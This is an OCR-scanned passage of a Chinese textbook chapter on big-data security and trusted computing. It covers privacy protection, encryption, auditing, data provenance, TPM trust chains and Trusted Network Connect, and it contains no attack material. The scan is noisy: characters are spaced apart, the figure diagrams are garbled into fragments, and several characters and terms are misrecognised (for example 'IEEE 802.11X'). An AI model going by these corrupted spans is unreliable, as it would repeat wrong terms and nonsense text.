私 的 定义 也 会 存在 差别 的 ,例如 ,保守 的 病人 会 视 疾 病 信息 为 隐私 ,而 开放 的 病人 却 不 视 
之 为 隐私 。 一 般 来 说 ,从 隐私 所 有 者 的 角度 而 言 , 隐 私 可 以 为 : 个 人 隐私 和 共同 隐私 ,其 
中 个 人 隐私 是 指 任何 可 以 确认 特定 个 人 或 与 可 确认 的 个 人 相关 及 个 人 不 愿 被 透漏 的 信 
息 ,都 叫做 个 人 隐私 ,如 身份 证 号 .就 诊 记 录 等 。 共 同 隐私 不 仅 包含 个 人 的 隐私 ,还 包含 所 
有 个 人 共同 表现 出 的 但 不 愿 被 暴露 的 信息 ,如 公司 员工 的 平均 薪资 .社交 网 络 群 组 成 员 的 
共同 爱好 等 信息 。 

隐私 保护 技术 主要 保护 以 下 两 个 方面 的 内 容 : 如 何 保证 数据 应 用 过 程 中 不 泄露 隐 
私 , 以 及 如 何 更 有 利于 数据 的 应 用 。 

当前 ,隐私 保护 领域 的 研究 工作 主要 集中 于 如 何 设 计 隐私 保护 原则 和 算法 更 好 地 达 
到 这 两 方面 的 均衡 。 隐 私 保护 技术 主要 有 以 下 3 类 : 

(1) 基于 数据 变换 的 隐私 保护 技术 。 所 谓 数据 变换 ,简单 地 讲 就 是 对 敏感 属性 进行 
转换 ,使 原始 数据 部 分 失真 ,但 是 同时 保持 某 些 数据 或 数据 属性 不 变 的 保护 方法 。 目 前 ， 
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该 类 技术 主要 包括 随机 化 .数据 交换 、 添 加 噪声 等 。 一 般 来 说 , 当 进 行 分 类 器 构建 和 关联 
规则 挖掘 ,而 数据 所 有 者 又 不 希望 发 布 真实 数据 时 ,可 以 预先 对 原始 数据 进行 扰动 后 再 
发 布 。 

(2) 基于 数据 加 密 的 隐私 保护 技术 。 采 用 对 称 或 非 对 称 加 密 技 术 在 数据 挖掘 过 程 中 
隐藏 敏感 数据 ,多 用 于 分 布 式 应 用 环境 中 ,如 分 布 式 数据 挖掘 、 分 布 式 安全 查询 、 集 合计 
算 、 科 学 计算 等 。 

分 布 式 应 用 一 般 采 用 两 种 模式 存储 数据 : 垂直 划分 和 水 平 划分 的 数据 模式 。 垂 直 划 
分 数据 是 指 分 布 式 环境 中 每 个 站 点 只 存储 部 分 属性 的 数据 ,所 有 站 点 存储 的 数据 不 重复 ; 
水 平 划 分 数据 是 将 数据 记录 存储 到 分 布 式 环境 中 的 多 个 站 点 ,所 有 站 点 存储 的 数据 不 
重复 。 

(3) 基于 匿名 化 的 隐私 保护 技术 。 匿 名 化 是 指 根据 具体 情况 有 条 件 地 发 布 数据 。 如 
不 发 布 数据 的 某 些 域 值 .数据 泛 化 等 。 限 制 发 布 即 有 选择 的 发 布 原始 数据 ,不 发 布 或 者 发 
布 精度 较 低 的 敏感 数据 ,以 实现 隐私 保护 。 数 据 匿名 化 一 般 采 用 两 种 基本 操作 : 抑制 和 
泛 化 。 抑 制 是 指 抑制 某 些 数据 项 , 即 不 发 布 该 数据 项 ; 泛 化 是 指 对 数据 进行 更 概括 、 抽 象 
的 描述 。 

2) 数据 加 密 

大 数据 环境 下 ,数据 可 以 分 为 两 类 : 静态 数据 和 动态 数据 。 静 态 数 据 是 指 文档 、 报 
表 资料 等 不 参与 计算 的 数据 ;动态 数据 则 是 指 需要 检索 或 参与 计算 的 数据 。 

使 用 SSL VPN 可 以 保证 数据 传输 的 安全 ,但 存储 系统 要 先 解密 数据 ,然后 进行 存 
储 , 当 数据 以 明文 的 方式 存储 在 系统 中 时 , 面 对 未 被 授权 的 入侵 者 的 破坏 、 修 改 和 重 放 攻 
击 显得 很 脆弱 ,对 重要 数据 的 存储 加 密 是 必须 采取 的 技术 手段 。 然 而 必 先 加 密 再 存储 ”的 
加 密 方案 只 能 适用 于 静态 数据 ,对 于 需要 参与 运算 的 动态 数据 则 无 能 为 力 , 因 为 动态 数据 
需要 在 CPU 和 内 存 中 以 明文 形式 存在 。 

3) 数据 备份 与 恢复 

数据 存储 系统 应 提供 完备 的 数据 备份 和 恢复 机 制 来 保障 数据 的 可 用 性 和 完整 性 。 一 
旦 发 生 数据 丢失 或 破坏 ,可 以 利用 备份 来 恢复 数据 ,从 而 保证 在 故障 发 生 后 数据 不 丢失 。 
常见 的 备份 与 恢复 机 制 有 : 异地 备份 .RAID( 独 立 磁盘 元 余 阵 列 ) .数据 镜像 .快照 等 。 

在 大 数据 环境 下 ,备份 与 恢复 数据 是 一 个 比较 棘手 的 问题 , Hadoop 作为 应 用 最 广泛 
的 大 数据 软件 架构 ,其 分 布 式 文件 系统 HDFS 可 以 利用 自身 的 数据 备份 和 恢复 机 制 来 实 
现 数据 可 靠 保 护 。 

3. 数据 挖掘 安全 技术 

数据 挖掘 是 大 数据 应 用 的 核心 部 分 ,是 挖掘 大 数据 价值 的 过 程 , 即 从 海量 的 数据 中 自 
动 抽取 隐藏 在 数据 中 有 用 信息 的 过 程 , 有 用 信息 可 能 包括 规则 、 概 念 、 规 律 及 模式 等 。 数 
据 挖掘 融合 了 数据 库 、 人 工 智能 、 机 器 学 习 、 统 计 学 高 性 能 计算 、 模 式 识 别 、 神 经 网 络 . 数 
据 可 视 化 、 信 息 检索 和 空间 数据 分 析 等 多 个 领域 的 理论 和 技术 ,数据 挖掘 的 专业 性 决定 了 
拥有 大 数据 的 机 构 又 往往 不 是 专业 的 数据 挖掘 者 ,因此 ,在 挖掘 大 数据 核心 价值 的 过 程 
中 ,可 能 会 引入 第 三 方 挖 掘 机 构 ,如 何 保证 第 三 方 在 进行 数据 挖掘 的 过 程 中 不 植 人 恶意 程 
序 , 不 窃取 系统 数据 ,这 是 大 数据 应 用 进程 中 必然 要 面临 的 问题 。 
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对 数据 挖掘 者 的 身份 认证 和 访问 管理 是 需要 解决 的 首要 安全 问题 , 接 下 来 在 介绍 这 
两 类 技术 机 制 的 基础 上 ,总 结 其 在 大 数据 挖掘 过 程 中 的 应 用 方法 。 

1) 身份 认证 

身份 认证 是 指 计算 机 及 网 络 系统 确认 操作 者 身份 的 过 程 , 也 就 是 证 实用 户 的 真实 身 
份 与 其 所 声称 的 身份 是 否 符合 的 过 程 。 根 据 被 认证 方 能 够 证 明 身 份 的 认证 信息 ,身份 认 
证 技术 可 以 分 为 3 种 : 

(1) 基于 秘密 信息 的 身份 认证 技术 。 所 谓 的 秘密 信息 是 指 用 户 所 拥有 的 秘密 知识 ， 
如 用 户 ID, 口 令 、 密 钥 等 。 基 于 秘密 信息 的 身份 认证 方式 包括 基于 账号 和 口令 的 身份 认 
证 、 基 于 对 称 密 钥 的 身份 认证 、 基 于 密 钥 分 配 中 心 (KDC) 的 身份 认证 、 基 于 公 钥 的 身份 认 
证 ,基于 数字 证 书 的 身份 认证 等 。 

(2) 基于 信物 的 身份 认证 技术 。 主 要 有 基于 信用 卡 、 智 能 卡 、 令 牌 的 身份 认证 等 。 智 
能 卡 也 叫 令 牌 卡 ,实质 上 是 IC 卡 的 一 种 。 智 能 卡 的 组 成 部 分 包括 微 处 理 器 、 存 储 器 输入 
输出 部 分 和 软件 资源 。 为 了 更 好 地 提高 性 能 ,通常 会 有 一 个 分 离 的 加 密 处 理 器 。 

(3) 基于 生物 特征 的 身份 认证 技术 。 包 括 基 于 生理 特征 (如 指纹 、 声 音 、 虹 膜 ) 的 身份 
认证 和 基于 行为 特征 (如 步 态 、 签 名 ) 的 身份 认证 等 。 

2) 访问 控制 

访问 控制 是 指 主体 依据 某 些 控制 策略 或 权限 对 客体 或 其 资源 进行 的 不 同 授权 访问 ， 
限制 对 关键 资源 的 访问 ,防止 非法 用 户 进入 系统 及 合法 用 户 对 资源 的 非法 使 用 。 访 问 控 
制 是 进行 数据 安全 保护 的 核心 策略 ,为 有 效 控制 用 户 访问 数据 存储 系统 ,保证 数据 资源 的 
安全 ,可 授予 每 个 系统 访问 者 不 同 的 访问 级 别 , 并 设置 相应 的 策略 保证 合法 用 户 获 得 数据 
的 访问 权 。 访 问 控制 一 般 可 以 是 自主 或 者 非 自 主 的 ,最 常见 的 访问 控制 模式 有 : 自主 访 
问 控制 ,强制 访问 控制 和 基于 角色 的 访问 控制 。 虽 然 这 3 种 访问 控制 模式 在 底层 机 制 上 
不 同 , 但 它们 本 身 却 可 以 相互 兼容 ,并 以 多 种 方式 组 合 使 用 。 后 来 出 现 一 些 新 的 访问 控制 
机 制 ,如 基于 时 空 的 访问 控制 ,基于 行为 的 访问 控制 ,基于 身份 的 访问 控制 和 基于 属性 的 
访问 控制 等 。 

4. 数据 发 布 安全 技术 

数据 发 布 是 指 大 数据 在 经 过 数据 挖掘 分 析 后 ,向 数据 应 用 实体 输出 挖掘 结果 数据 的 
环节 ,也 就 是 数据 “出 门 ” 的 环节 ,其 安全 性 尤其 重要 。 数 据 发 布 前 必须 对 即将 输出 的 数据 
进行 全 面 的 审查 ,确保 输出 的 数据 符合 “不 泄密 、 无 隐私 、 不 超 限 、 合 规约 ”等 要 求 。 因 此 ， 
安全 的 审计 技术 在 数据 输出 环节 是 必需 的 。 

当然 ,再 严密 的 审计 手段 ,也 难免 有 玻 漏 之 处 ,在 数据 发 布 后 ,一 旦 出 现 机 密 外 泄 、 隐 
私 泄露 等 数据 安全 问题 ,必须 要 有 必要 的 数据 溯源 机 制 ,确保 能 够 迅速 地 定位 到 出 现 问题 
的 环节 .出现 问题 的 实体 ,以便 对 出 现 泄 露 的 环节 进行 封 堵 , 追 查 责任 者 ,杜绝 类 似 问题 的 
再 次 发 生 。 

1) 安全 审计 技术 

安全 审计 是 指 在 记录 一 切 (或 部 分 ) 与 系统 安全 有 关 活动 的 基础 上 ,对 其 进行 分 析 处 
理 、 评 估 审 查 ,查找 安全 隐患 ,对 系统 安全 进行 审核 稽查 和 计算 ,追查 造成 事故 的 原因 ,并 
做 出 进一步 的 处 理 。 目 前 常用 的 审计 技术 有 如 下 几 种 : 
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(1) 基于 日 志 的 审计 技术 。 通 常 SQL 数据 库 和 NoSQL 数据 库 均 具有 日 志 审 计 功 
能 ,通过 配置 数据 库 的 自 审计 功能 , 即 可 实现 对 大 数据 的 审计 。 日 志 审 计 能 够 对 网 络 操 作 
及 本 地 操作 数据 的 行为 进行 审计 ,由 于 依托 于 现 有 的 数据 存储 系统 ,兼容 性 很 好 。 但 这 种 
审计 技术 的 缺点 也 比较 明显 ,在 数据 存储 系统 上 开启 自身 日 志 审 计 对 数据 存储 系统 的 性 
能 有 影响 ,特别 是 在 大 流量 情况 下 ,损耗 较 大 。 

(2) 基于 网 络 监听 的 审计 技术 。 基 于 网 络 监听 的 审计 技术 是 通过 将 对 数据 存储 系统 
的 访问 流量 镜像 到 交换 机 某 一 个 端口 ,然后 通过 专用 硬件 设备 对 该 端口 流量 进行 分 析 和 
还 原 , 从 而 实现 对 数据 访问 的 审计 。 基 于 网 络 监听 的 审计 技术 最 大 的 优点 就 是 与 现 有 数 
据 存储 系统 无 关 , 部 署 过 程 不 会 给 数据 库 系 统 带 来 性 能 上 的 负担 ,即使 出 现 故障 也 不 会 影 
响 数据 库 系统 的 正常 运行 ,具备 易 部 署 . 无 风险 的 特点 ;但 是 ,其 部 署 的 实现 原理 决定 了 网 
络 监听 技术 在 针对 加 密 协议 时 ,只 能 实现 到 会 话 级 别 审计 , 即 可 以 审计 到 时 间 、 源 IP、 源 
端口 .目的 IP、 目 的 端口 等 信息 ,而 无 法 对 内 容 进 行 审计 。 

(3) 基于 网 关 的 审计 技术 。 该 技术 通过 在 数据 存储 系统 前 部 署 网 关 设 备 , 在 线 截获 
并 转发 到 数据 存储 系统 的 流量 而 实现 审计 。 该 技术 起 源 于 安全 审计 在 互联 网 审计 中 的 应 
用 ,在 互联 网 环境 中 ,审计 过 程 除了 记录 以 外 ,还 需要 关注 控制 ,而 网 络 监听 方式 无 法 实现 
很 好 的 控制 效果 , 故 多 数 互联 网 审计 厂商 选择 通过 串 行 的 方式 来 实现 控制 。 在 实际 应 用 
过 程 中 ,网 关 审计 技术 往往 主要 运用 在 对 数据 运 维 审计 的 情况 下 ,不 能 完全 覆盖 所 有 对 数 
据 访问 行为 的 审计 。 

2) 数据 溯源 技术 

数据 溯源 是 一 个 新 兴 的 研究 领域 ,诞生 于 20 世纪 90 年 代 , 普 遍 理解 为 追踪 数据 的 起 
源 和 重 现 数据 的 历史 状态 ,目前 还 没有 公认 的 定义 。 在 大 数据 应 用 领域 ,数据 溯源 就 是 对 
大 数据 应 用 周期 的 各 个 环节 的 操作 进行 标记 和 定位 ,在 发 生 数 据 安全 问题 时 ,可 以 及 时 准 
确 地 定位 到 出 现 问题 的 环节 和 责任 者 ,以 便于 对 数据 安全 问题 的 解决 。 

目前 学 术 界 对 数据 溯源 的 理论 研究 主要 基于 数据 集 溯源 的 模型 和 方法 展开 ,主要 的 
方法 有 标注 法 和 反 向 查询 法 ,这 些 方法 都 是 基于 对 数据 操作 记录 的 ,对 于 恶意 窃取 ,非法 
访问 者 来 说 ,很 容易 破坏 数据 溯源 信息 。 大 数据 溯源 系统 都 是 在 一 个 独立 的 系统 内 部 实 
现 漳 源 管理 ,数据 如 何在 多 个 分 布 式 系统 之 间 转 换 或 传播 ,没有 统一 的 业界 标准 。 随 着 云 
计算 和 大 数据 环境 的 不 断 发 展 ,数据 溯源 问题 变 得 越 来 越 重 要 ,逐渐 成 为 研究 的 热点 。 
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随 着 计算 机 网 络 的 深度 应 用 ,最 突出 的 首要 3 位 安全 威胁 是 : 恶意 代码 攻击 、 信 息 非 
法 窃取 \ 数 据 和 系统 非法 破坏 ,其 中 以 用 户 私密 信 息 为 目标 的 恶意 代码 攻击 超过 传统 病毒 
成 为 最 大 安全 威胁 。 这 些 安 全 威胁 根源 在 于 没有 从 体系 架构 上 建立 计算 机 的 恶意 代码 攻 
击 免 疫 机 制 。 因 此 如 何 从 体系 架构 上 建立 恶意 代码 攻击 免疫 机 制 ,实现 计算 系统 平台 
全 ,可 信赖 地 运行 ,已 经 成 为 叹 待 解决 的 核心 问题 。 

可 信 计 算 就 是 在 此 背景 下 提出 的 一 种 技术 理念 ,其 主要 思想 是 : 在 硬件 平台 上 引入 
具有 一 定 防 算 改 能 力 的 安全 芯片 ,并 以 该 芯片 为 " 根 ? 构 造 一 个 体系 ,建立 一 种 特定 的 完整 
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性 度量 机 制 , 保 证 在 “ 根 ” 得 到 信任 的 前 提 下 ,计算 平台 在 运行 时 具备 分 辨 可 信 程序 代码 与 
不 可 信 程序 代码 的 能 力 , 从 而 对 不 可 信和 的 程序 代码 建立 有 效 的 防治 方法 和 措施 。 换 句 话 
说 ,就 是 通过 加 入 安全 芯片 , 辅 以 其 他 硬件 .固件 和 软件 ,将 部 分 或 整个 计算 平台 变 成 “可 
信 ” 的 计算 平台 。 

目前 可 信 计 算 中 的 “可 信 ” 存 在 多 种 不 同 定 义 。ISO/IEC 将 可 信和 定义 为 : 参与 计算 的 
组 件 .操作 或 过 程 在 任意 的 条 件 下 是 可 预测 的 ,并 能 够 抵御 病毒 和 一 定 程 度 的 物理 干扰 。 
由 众多 国际 IT 厂商 共同 组 建 的 (Trust Computing Group,TCG) 组 织 将 可 信 定 义 为 : 一 
个 实体 是 可 信 的 ,如 果 它 的 行为 总 是 以 预期 的 方式 , 朝 着 预期 的 目标 。TCG 的 可 信 计 算 
技术 思路 是 通过 在 硬件 平台 上 引入 硬件 安全 芯片 , 即 可 信 平 台 模 块 (Trusted Platform 
Module,TPM) ,来 提高 计算 机 系统 的 安全 性 。 这 种 技术 思路 目前 得 到 了 产业 界 的 普遍 
认同 。 

可 信 计 算 技 术 综 合 了 多 种 安全 技术 ,涵盖 了 众多 的 研究 开发 点 ,当前 的 主要 研究 方向 
集中 在 可 信 计 算 安全 体系 结构 (包括 虚拟 技术 、 仅 执行 内 存 (XOM)、AEGIS .Cerium) 、 安 
全 启动 .远程 证 明 \ 安 全 增强 (包括 操作 系统 安全 增强 、Web 服务 器 安全 增强 ,PKI 增强 )、 
可 信 计 算 应 用 与 测评 (包括 数字 版 权 管 理 (DRM) 、TPM 测评 ) 等 。 

TCG 在 2003 年 推出 了 TPM 1. 2 技术 规范 ,从 个 人 计算 机 到 服务 器 平板 电脑 ,移动 
电话 等 ,以 可 信 平 台 模 块 为 信任 根 , 将 可 信 计 算 技 术 渗 透 到 计算 平台 各 个 层面 ,以 建立 满 
足 各 行 各 业 对 可 信 计 算 环 境 构 建 的 技术 要 求 ,如 图 13-6 所 示 。 与 此 同时 ,我 国政 府 、 学 术 
界 和 产业 界 也 在 积极 推动 可 信 计 算 的 研究 和 相关 产品 的 研发 工作 。2007 年 ,我 国 国家 密 
码 管理 局 发 布 了 《可 信 计 算 密码 支撑 平台 功能 与 接口 规范 ), 标 志 着 我 国 独立 自主 的 可 信 
计算 和 标准 的 成 熟 。 随 着 我 国 具 有 自主 知识 产权 的 TCM (Trusted Cryptography 
Module) 芯 片 的 推出 ,我国 深 入 展开 了 以 TCM 为 基础 的 系统 研究 开发 和 推广 工作 。 


TCG 标准 存储 
渗透 到 IT 每 个 领域 “3 [| 系统 


TPM 
图 13-6 ”可 信 计 算 技 术 应 用 广泛 
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可 信 计 算 的 宗旨 是 ,以 可 信 计 算 安 全 芯片 为 核心 改进 现 有 平台 体系 结构 ,增强 通用 
计算 平台 和 网 络 的 可 信和 性 。 国 际 可 信 计 算 组 织 TCG(Trust Computing Group) 在 现 有 
体系 结构 上 引入 硬件 安全 芯片 TPM, 利 用 TPM 的 安全 特性 来 保证 通用 计算 平台 的 
可 信 。 

TCG 是 一 个 非 青 利 的 工业 标准 组 织 , 于 2003 年 成 立 , 并 采纳 了 由 美国 IBM、 HP、 
Intel\、 微 软 等 著名 企业 组 成 的 可 信 计 算 平台 联盟 (Trusted Computing Platform Alliance， 
TCPA) 所 开发 的 规范 TCPA TPM v1.1。 同 年 ,TCG 推出 了 新 的 规范 TPM v1. 2。2005 
年 ,TCG 推出 可 信 网 络 连接 规范 v 1. 0。 

TCG 可 信 计 算 平台 提供 3 个 基本 特性 : 

(1) 受 保护 能 力 (Protected Capability) : 即 一 个 命令 集 , 其 中 的 命令 具有 访问 被 屏蔽 
位 置 的 特权 。 被 屏蔽 位 置 就 是 能 安全 的 操作 敏感 数据 的 地 方 ,如 内 存 、 寄 存 器 等 ,或 者 说 
是 仅 能 被 受 保护 能 力 访问 的 数据 位 置 。 

(2) 平台 证 明 (Platform Attestation) : 一 个 平台 能 够 证 明 对 影响 平台 完整 性 (可 信 
的 ) 的 平台 特性 的 描述 ,所 有 形式 的 证 明 都 需要 作证 实体 提供 可 靠 的 证 据 。 

(3) 完整 性 度量 .存储 与 报告 (Integrity Measurement, Storage and Report) : 完整 性 
度量 就 是 获取 影响 一 个 平台 的 完整 性 的 特性 的 量度 ,存储 这 些 度量 值 ,并 将 其 摘要 放 人 平 
台 配 置 寄 存 器 (PCR) 中 的 过 程 。 

可 信 计 算 平台 体系 结构 如 图 13-7 所 示 。 硬 件 层 是 构建 可 信 计 算 平 台 的 基础 ,其 中 
TPM 是 平台 的 信任 根 , 是 可 信 计 算 平 台 信 任 链 的 源 点 和 起 点 。 平 台 ( 服 务 器 、 移 动 终端 
等 ) 运 行 的 部 件 是 以 操作 系统 服务 的 形式 存在 的 ,为 上 层 软 件 层 应 用 程序 提供 密码 管理 服 
务 接口 ,同时 具备 线程 管理 的 功能 。 在 平台 和 软件 层 之 间 存 在 标准 的 安全 芯片 密码 服务 
接口 。 在 软件 层 , 可 信 计 算 平台 利用 TPM 提供 的 功能 支持 多 种 应 用 和 软件 服务 ,如 安全 
芯片 管理 工具 `VPN ,安全 E-mail\ 磁 盘 加 密 等 。 


i 1 1 1 
1 hg 1 
| 可 售 计算 平台 应 用 | | | | 
1 软 | 1 
| 件 | | 从 | 可 信和 网 络 连 接 | | 
1 层 | 可 信 计 算 平台 | 1 1 | 
| 软件 服务 1 | 
一 一 WA | 
| 一 | 
| 要 平台 (服务 器 、 移 动 终端 等 ) | 
上 1 
| 层 TPM | 
站 1 


图 13-7 可 信 计 算 平台 系统 结构 


可 信 计 算 平台 是 指 本 机 用 户 及 远程 交易 方 都 信赖 的 平台 ,可 以 从 四 个 方面 来 理解 : 
首先 ,用 户 的 身份 唯一 性 认证 ,是 对 使 用 者 的 信任 ;其 次 ,平台 软 硬 件 配置 的 正确 性 ,体现 
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了 使 用 者 对 平台 运行 环境 的 信任 ;再 次 ,应 用 程序 的 完整 性 和 合法 性 ,体现 了 应 用 程序 运 
行 的 可 信 ; 最 后 ,平台 之 间 的 可 验证 性 , 指 网 络 环境 下 平台 之 间 的 相互 信任 。 

1. 可 信 计 算 终端 平台 信任 技术 

可 信 计 算 平台 的 基本 思想 如 下 : 

(1) 首先 建立 一 个 信任 根 ,信任 根 的 可 信 性 由 物理 安全 和 管理 安全 确保 。 

(2) 再 建立 一 条 信任 链 , 从 信任 根 开始 到 硬件 平台 、 到 BIOS、 到 操作 系统 、 再 到 应 用 ， 
一 级 测量 认证 一 级 ,一 级 信任 一 级 。 从 而 把 这 种 信任 扩展 到 整个 计算 机 系统 。 

1) 信任 根 技术 

在 TCG 可 信 计 算 平台 中 ,信任 根 是 必须 被 信任 的 组 件 。 一 个 完全 的 根 信 任 集合 至 
少 要 有 描述 影响 平台 可 信和 性 的 平台 特性 所 必需 的 最 少 的 功能 。TCG 认为 一 个 信任 根 包 
括 3 个 根 : 

(1) 可 信和 度量 根 (Root of Trust for Measurement, RTM)。 

(2) 可 信 存 储 根 (Root of Trust for Storage,RTS) 。 

(3) 可 信 报 告 根 (Root of Trust for Reporting, RTR)。 

其 中 ,RTM 是 能 够 在 内 部 进行 可 靠 的 完整 性 检测 的 计算 引擎 ,是 一 个 软件 模块 。 具 
有 代表 性 的 是 受 对 检测 的 核心 根 信任 (CRTM) 控 制 的 普通 平台 计算 引擎 。 RTM 同时 也 
是 传递 信任 链 的 根 。 

RTS 是 能 够 维护 一 个 精确 的 对 完整 性 摘要 的 值 和 摘要 的 次 序 进行 概括 的 计算 引擎 ， 
以 此 向 访问 实体 报告 平台 或 其 上 运行 实体 的 可 信和 度 的 依据 。 可 信和 存储 根 RTS 由 可 信 平 
台 模 块 TPM 芯片 和 存储 根 密 钥 SRK 组 成 。 

RTR 是 能 够 可 靠 的 报告 RTS 持 有 的 信息 的 计算 引擎 。 询 问 实 体 据 此 来 衡量 当前 平 
台 的 可 信和 度 , 并 决定 是 否 与 该 平台 建立 会 话 。 可 信 报 告 根 RTR 由 可 信 平 台 模 块 TPM 芯 
片 和 根 密 钥 EK 组 成 。 

2) 信任 链 技 术 

TCG 的 信任 度量 采用 了 一 种 链 式 的 信任 度量 模型 ,简称 为 信任 链 , 其 目的 是 测试 信 
任 链 上 各 结 点 的 真实 性 和 正确 性 ,如 图 13-8 所 示 。 从 BIOS Boot Block 一 BIOS 一 
OSLoader 习 OS 构成 了 一 个 串 行 链 ,其 中 BIOS Boot Block 是 可 信和 度量 根 ,采用 了 一 种 
迭代 计算 Hash 值 的 方式 ,即将 现 值 与 新 值 相连 ,再 计算 Hash 值 ,并 被 作为 新 的 完整 性 度 
量 值 存储 到 平台 配置 寄存 器 PCR 中 : 

New PCR;= HASH(Old PCR;|| New Value) 
其 中 符号 | | 表示 连接 。 

信任 链 的 这 种 链 式 信任 度量 模型 的 最 大 优点 ,是 实现 了 可 信 计 算 的 基本 思想 。 并 且 
与 现 有 计算 机 有 和 较 好 的 兼容 性 ,实现 简单 。 

但 是 ,这 种 链 式 信任 度量 模型 具有 如 下 的 缺点 : 首先 ,信任 链 较 长 ,而 信任 传递 的 路 
径 越 长 ,信任 的 损失 就 可 能 越 大 ;其 次 ,信任 度量 值 的 计算 采用 迭代 计算 Hash 值 的 方式 ， 
使 得 在 信任 链 中 加 入 或 删除 一 个 部 件 时 ,如 信任 链 中 的 软件 部 件 更 新 , PCR 的 值 都 得 重 
新 计算 ,很 麻烦 ;最 后 ,在 实现 技术 上 .可 信和 度量 根 RTM (在 图 13-8 中 是 BIOS Boot 
Block) 是 一 个 软件 模块 ,将 它 存 储 在 TPM 之 外 ,容易 受到 恶意 攻击 。 


图 13-8 信任 链 技术 


对 BIOS 操作 系统 OS 的 数据 完整 性 测试 认证 是 静态 的 。 但 是 ,软件 数据 完整 性 还 
不 能 保证 动态 的 安全 性 ,因此 ,还 必须 进行 动态 可 信 性 的 测量 认证 。 

平台 动态 信任 环境 构建 技术 主要 分 为 两 个 阶段 来 实施 , 即 平台 启动 阶段 和 平台 运行 
阶段 。 在 启动 阶段 ,主要 通过 可 信 引 导 技 术 保证 BIOS .引导 程序 .操作 系统 内 核 可 信 :; 在 
运行 阶段 ,主要 通过 操作 系统 组 件 动态 度量 技术 ,保证 系统 运行 组 件 如 软件 .应 用 程序 等 
可 信 。 组 件 动态 度量 方法 ,能 够 即时 的 反应 系统 当前 时 刻 的 完整 性 ;支持 在 任意 时 刻度 量 
进程 状态 ,所 以 能 够 最 大 程度 避免 度量 失效 :通过 TPM/TCM 保证 度量 架构 本 身 的 安 
全 性 。 

3) 虚拟 平台 度量 技术 

随 着 虚拟 技术 的 发 展 ,终端 平台 的 虚拟 化 应 用 越 来 越 广泛 。 虚 拟 平台 度量 技术 的 研 
究 逐 渐 成 为 研究 热点 。 这 方面 的 主要 成 果 包 括 LKIM 系统 .HIMA 和 Hyper Sentry 度 
量 架 构 。LKIM 和 HIMA 都 是 利用 虚拟 平台 的 隔离 特性 ,通过 对 虚拟 机 内 存 的 监控 实现 
对 虚拟 机 的 完整 性 度量 。 而 Hyper Sentry 采用 硬件 机 制 , 在 Hypervisor 无 法 感知 的 情 
况 下 对 其 进行 度量 。 虚 拟 平台 构建 信任 的 基础 在 于 建立 为 多 个 虚拟 机 提供 信任 服务 的 信 
任 根 。IMB 提出 了 vTPM 架构 ,以 软件 虚拟 的 方式 为 每 个 虚拟 机 提供 一 个 单独 的 
vTPM, 从 而 规避 多 个 虚拟 机 共享 TPM 的 资源 冲突 问题 。 德 国 波 鸿 鲁 尔 大 学 在 vTPM 
架构 的 基础 上 提出 了 基于 属性 的 TPM 虚拟 方案 ,进一步 增强 vTPM 的 可 用 性 。 这 两 种 
方案 的 不 足 都 在 于 vTPM 与 TPM 之 间 缺 乏 有 效 绑 定 。 

2. 可 信 计 算 平台 间 信 任 扩展 技术 

在 终端 平台 信任 构建 的 基础 上 ,将 终端 平台 的 信任 扩展 到 远程 平台 的 主要 方法 是 远 
程 证 明 , 它 主要 包括 平台 身份 证 明和 平台 状态 证 明 。 

在 平台 身份 证 明 方面 TPM v1. 1 规范 首先 提出 了 基于 Privacy CA 的 身份 证 明 方案 。 
它 通过 平台 身份 证 书证 明 平台 真实 身份 。 该 方案 无 法 实现 平台 身份 的 匿名 性 。 针 对 
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TPM 匿名 证 明 的 需求 ,TPM v1. 2 规范 提出 了 基于 CL 签名 的 直接 匿名 证 明 (Direct 
Anonymous Attestation,DAA) 方 案 。DAA 的 早期 研究 主要 针对 RSA 密码 体制 展开 ,这 
方面 的 研究 都 存在 DAA 签名 长 度 较 长 .计算 量 大 的 缺点 。 后 来 有 学 者 提出 了 基于 椭圆 
曲线 及 双 线 性 映射 的 DAA 方案 ,大 幅度 提高 计算 和 通信 性 能 ,此 后 大 量 的 改进 研究 主要 
集中 在 效率 提高 方面 。 

在 平台 状态 证 明 ,TCG 提出 二 进 制 直接 远程 证 明 方 法 。IBM 遵循 该 方法 实现 直接 证 
明 的 原型 系统 。 这 种 方法 存在 平台 配置 容易 泄漏 、 扩 展 性 差 等 问题 。 为 克服 上 述 柬 端 , 国 
际 上 提出 了 基于 属性 的 证 明 方 法 ,将 平台 配置 度量 值 转换 为 特定 的 安全 属性 ,并 加 以 证 
明 。 这 方面 的 主要 研究 成 果 有 IBM 基于 属性 证 明 的 框架 ,和 德国 波 鸿 鲁 尔 大 学 的 属性 远 
程 证 明 实现 方案 。 
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仅 有 终端 可 信和 是 不 能 满足 需求 的 ,还 需 将 终端 的 信任 扩展 到 网 络 ,将 网 络 构建 成 一 个 
可 信 的 计算 环境 。 

TCG 组 织 于 2005 年 发 布 了 可 信和 网 络 连接 (Trusted Network Connection,TNC) 架 构 
规范 1. 0 版 。 其 特点 在 于 ,将 终端 完整 性 引入 网 络 接 入 控制 的 判定 当中 。TCG 对 网 络 接 
入 规范 进行 了 持续 的 改进 。 在 最 新 发 布 的 规范 中 TNC 架构 增加 了 元 数据 存 取 点 (Meta 
Access Point,MAP) 和 MAP 客户 端 ,能 够 根据 元 数据 信息 的 变化 动态 ,控制 终端 对 网 络 
的 访问 。 同 时 TNC 架构 还 实现 了 与 NAP 方案 的 互 操 作 。TNC 基础 架构 如 图 13-9 


所 示 。 
完整 性 | 完整 性 收 信 器 0 _ | 完整 性 验证 器 
度量 层 (IMC) (MYV) 
------ 十 ------ IF-IMC IF-IMV ------- 二 -=---- 
完整 性 | TNC 客 户 端 | _____JFINCCs _ _____ 一 | “TNC 服务 器 
评估 屋 (TNC Clienb (TNC Server) 
baa IT _ = 

网 络 | 网 络 访问 请 求 者 行 点 网 络 访问 授权 者 

访问 层 (NAR) Re (NAA) 
IF-PEP 
访问 请 求 者 AR 策略 执行 点 PEP 策略 执行 点 PDP 


图 13-9 TNC 基础 架构 


TNC 包括 3 个 实体 、3 个 层次 和 若干 个 接口 组 件 。 该 架构 在 传统 的 网 络 接 和 人 层次 上 
增加 了 完整 性 评估 层 与 完整 性 度量 层 , 实 现 对 接 人 平台 的 身份 验证 与 完整 性 验证 。 

TNC 分 为 网 络 访问 层 、 完 整 性 评估 层 、 完 整 性 度量 层 3 个 层次 。 网 络 访问 层 支持 传 
统 的 网 络 连接 技术 ,如 IEEE 802.11X 和 VPN 等 机 制 。 完 整 性 评估 层 进 行 平台 的 认证 ， 
